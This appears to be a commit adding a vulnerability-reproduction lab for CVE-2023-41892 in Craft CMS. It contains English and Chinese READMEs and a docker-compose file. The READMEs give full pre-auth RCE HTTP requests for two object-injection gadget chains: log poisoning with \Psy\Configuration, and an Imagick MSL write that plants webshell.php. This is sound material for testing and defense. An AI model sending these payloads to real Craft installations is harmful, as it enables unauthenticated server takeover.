first commit

craftcms/CVE-2023-41892/README.md

@@ -0,0 +1,126 @@
+# CraftCMS ConditionsController Pre-Auth Remote Code Execution (CVE-2023-41892)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Craft CMS is a flexible, user-friendly CMS for creating custom digital experiences on the web. It provides users with a backend interface to implement websites and configure the CMS.
+
+A vulnerability in Craft CMS versions 4.4.0 through 4.4.14 allows unauthenticated attackers to achieve remote code execution through the `ConditionsController`. The vulnerability exists due to insufficient input validation in the controller's `beforeAction` method, which can be exploited to create arbitrary objects and achieve code execution.
+
+References:
+
+- <https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g>
+- <https://blog.calif.io/p/craftcms-rce>
+- <https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable Craft CMS 4.4.14:
+
+```
+docker compose up -d
+```
+
+After the server is running, you can see the installation page at `http://your-ip:8088/admin/install`. Please follow the instructions to install CraftCMS, the default database address is `db` and the username and password are both `root`.
+
+![](1.png)
+
+## Vulnerability Reproduction
+
+The root cause of the vulnerability is that the attacker can send a specially crafted HTTP request to create arbitrary objects through PHP object injection. By chaining multiple gadgets in the codebase, the attacker can achieve remote code execution.
+
+There are two common gadgets that can be used to achieve remote code execution.
+
+### Gadget 1: `craft\elements\conditions\users\UserCondition` with `\Psy\Configuration`
+
+This gadget requires server logging to be enabled, which is enabled by default.
+
+First, send a POST request with a syntax error JSON to write the payload to the log file:
+
+```
+POST /index.php?action=conditions/render HTTP/1.1
+Host: localhost:8088
+Content-Type: application/json
+
+{
+aaaaaaaaaaaaaaaaaaaaa
+aaaaaaaaaaaaaaaaaaaaaa
+aaaaaaaaaaaaaaaaaaaaa
+<?php
+@phpinfo(); __halt_compiler();
+?>
+}
+```
+
+![](2.png)
+
+Then, trigger the remote code execution by including the log file through the `\Psy\Configuration` gadget (replace the `2025-03-31` with your current date):
+
+```
+POST /index.php?action=conditions/render HTTP/1.1
+Host: localhost:8088
+Content-Type: application/json
+
+{
+  "config": {
+    "name": "test",
+    "as xyz": {
+      "class": "\\Psy\\Configuration",
+      "__construct()": {
+        "config": {
+          "configFile": "../storage/logs/web-2025-03-31.log"
+        }
+      }
+    }
+  },
+  "test": "craft\\elements\\conditions\\users\\UserCondition"
+}
+```
+
+![](3.png)
+
+As you can see, the PHPINFO is executed successfully.
+
+### Gadget 2: `craft\elements\conditions\users\UserCondition` with built-in `Imagick` class
+
+If the Imagick extension is enabled, you can use the `Imagick` class with MSL format to write arbitrary files:
+
+```
+POST /index.php?action=conditions/render HTTP/1.1
+Host: localhost:8088
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytlNPtAxuuGOeUqqY
+
+------WebKitFormBoundarytlNPtAxuuGOeUqqY
+Content-Disposition: form-data; name="test"
+
+craft\elements\conditions\users\UserCondition
+------WebKitFormBoundarytlNPtAxuuGOeUqqY
+Content-Disposition: form-data; name="config[name]"
+
+test
+------WebKitFormBoundarytlNPtAxuuGOeUqqY
+Content-Disposition: form-data; name="config[as xyz][class]"
+
+imagick
+------WebKitFormBoundarytlNPtAxuuGOeUqqY
+Content-Disposition: form-data; name="config[as xyz][__construct()][0][0]"
+
+vid:msl:/tmp/php*
+------WebKitFormBoundarytlNPtAxuuGOeUqqY
+Content-Disposition: form-data; name="file"; filename="1.msl"
+Content-Type: text/plain
+
+<?xml version="1.0" encoding="UTF-8"?>
+<image>
+  <read filename="caption:&lt;?=phpinfo();?&gt;"/>
+  <write filename="info:webshell.php" />
+</image>
+------WebKitFormBoundarytlNPtAxuuGOeUqqY--
+```
+
+This payload will execute PHP code like `new Imagick('vid:msl:/tmp/php*');`, and cause the "Segmentation fault" error, which makes the thread crash:
+
+![](4.png)
+
+But the `webshell.php` file is written successfully:
+
+![](5.png)

craftcms/CVE-2023-41892/README.zh-cn.md

@@ -0,0 +1,124 @@
+# CraftCMS未授权远程代码执行漏洞（CVE-2023-41892）
+
+Craft CMS是一个灵活、用户友好的内容管理系统，用于在Web上创建自定义的数字体验。它为用户提供了一个后端界面来实现网站并配置CMS。
+
+Craft CMS 4.4.0至4.4.14版本中存在一个远程代码执行漏洞。未经身份验证的攻击者可以通过`ConditionsController`实现远程代码执行。该漏洞存在于控制器的`beforeAction`方法中，由于输入验证不足，攻击者可以利用该漏洞创建任意对象并实现代码执行。
+
+参考链接：
+
+- <https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g>
+- <https://blog.calif.io/p/craftcms-rce>
+- <https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/>
+
+## 环境搭建
+
+执行如下命令启动一个存在漏洞的Craft CMS 4.4.14环境：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8088/admin/install`即可看到CraftCMS的安装页面。请按照页面提示完成安装，默认数据库地址为`db`，用户名和密码均为`root`。
+
+![](1.png)
+
+## 漏洞复现
+
+漏洞的根本原因是攻击者可以通过PHP对象注入发送特制的HTTP请求来创建任意对象。通过链接代码库中的多个gadget，攻击者可以实现远程代码执行。
+
+有两种常用的gadget组合可以实现远程代码执行。
+
+### Gadget 1：使用`craft\elements\conditions\users\UserCondition`和`\Psy\Configuration`
+
+这个gadget需要服务器开启日志记录功能，该功能默认是开启的。
+
+首先，发送一个包含语法错误的JSON的POST请求，将payload写入日志文件：
+
+```
+POST /index.php?action=conditions/render HTTP/1.1
+Host: localhost:8088
+Content-Type: application/json
+
+{
+aaaaaaaaaaaaaaaaaaaaa
+aaaaaaaaaaaaaaaaaaaaaa
+aaaaaaaaaaaaaaaaaaaaa
+<?php
+@phpinfo(); __halt_compiler();
+?>
+}
+```
+
+![](2.png)
+
+然后，通过`\Psy\Configuration` gadget包含日志文件来触发远程代码执行（请将`2025-03-31`替换为当前日期）：
+
+```
+POST /index.php?action=conditions/render HTTP/1.1
+Host: localhost:8088
+Content-Type: application/json
+
+{
+  "config": {
+    "name": "test",
+    "as xyz": {
+      "class": "\\Psy\\Configuration",
+      "__construct()": {
+        "config": {
+          "configFile": "../storage/logs/web-2025-03-31.log"
+        }
+      }
+    }
+  },
+  "test": "craft\\elements\\conditions\\users\\UserCondition"
+}
+```
+
+![](3.png)
+
+如图所示，PHPINFO成功执行。
+
+### Gadget 2：使用`craft\elements\conditions\users\UserCondition`和内置的`Imagick`类
+
+如果服务器启用了Imagick扩展，可以使用`Imagick`类的MSL格式来写入任意文件：
+
+```
+POST /index.php?action=conditions/render HTTP/1.1
+Host: localhost:8088
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytlNPtAxuuGOeUqqY
+
+------WebKitFormBoundarytlNPtAxuuGOeUqqY
+Content-Disposition: form-data; name="test"
+
+craft\elements\conditions\users\UserCondition
+------WebKitFormBoundarytlNPtAxuuGOeUqqY
+Content-Disposition: form-data; name="config[name]"
+
+test
+------WebKitFormBoundarytlNPtAxuuGOeUqqY
+Content-Disposition: form-data; name="config[as xyz][class]"
+
+imagick
+------WebKitFormBoundarytlNPtAxuuGOeUqqY
+Content-Disposition: form-data; name="config[as xyz][__construct()][0][0]"
+
+vid:msl:/tmp/php*
+------WebKitFormBoundarytlNPtAxuuGOeUqqY
+Content-Disposition: form-data; name="file"; filename="1.msl"
+Content-Type: text/plain
+
+<?xml version="1.0" encoding="UTF-8"?>
+<image>
+  <read filename="caption:&lt;?=phpinfo();?&gt;"/>
+  <write filename="info:webshell.php" />
+</image>
+------WebKitFormBoundarytlNPtAxuuGOeUqqY--
+```
+
+这个payload会执行类似`new Imagick('vid:msl:/tmp/php*');`的PHP代码，并导致"Segmentation fault"错误，使线程崩溃：
+
+![](4.png)
+
+但是`webshell.php`文件已经成功写入：
+
+![](5.png)

craftcms/CVE-2023-41892/docker-compose.yml

@@ -0,0 +1,12 @@
+services:
+ web:
+   image: vulhub/craftcms:4.4.14
+   depends_on:
+    - db
+   ports:
+    - "8088:80"
+ db:
+   image: mysql:5.7
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=craftcms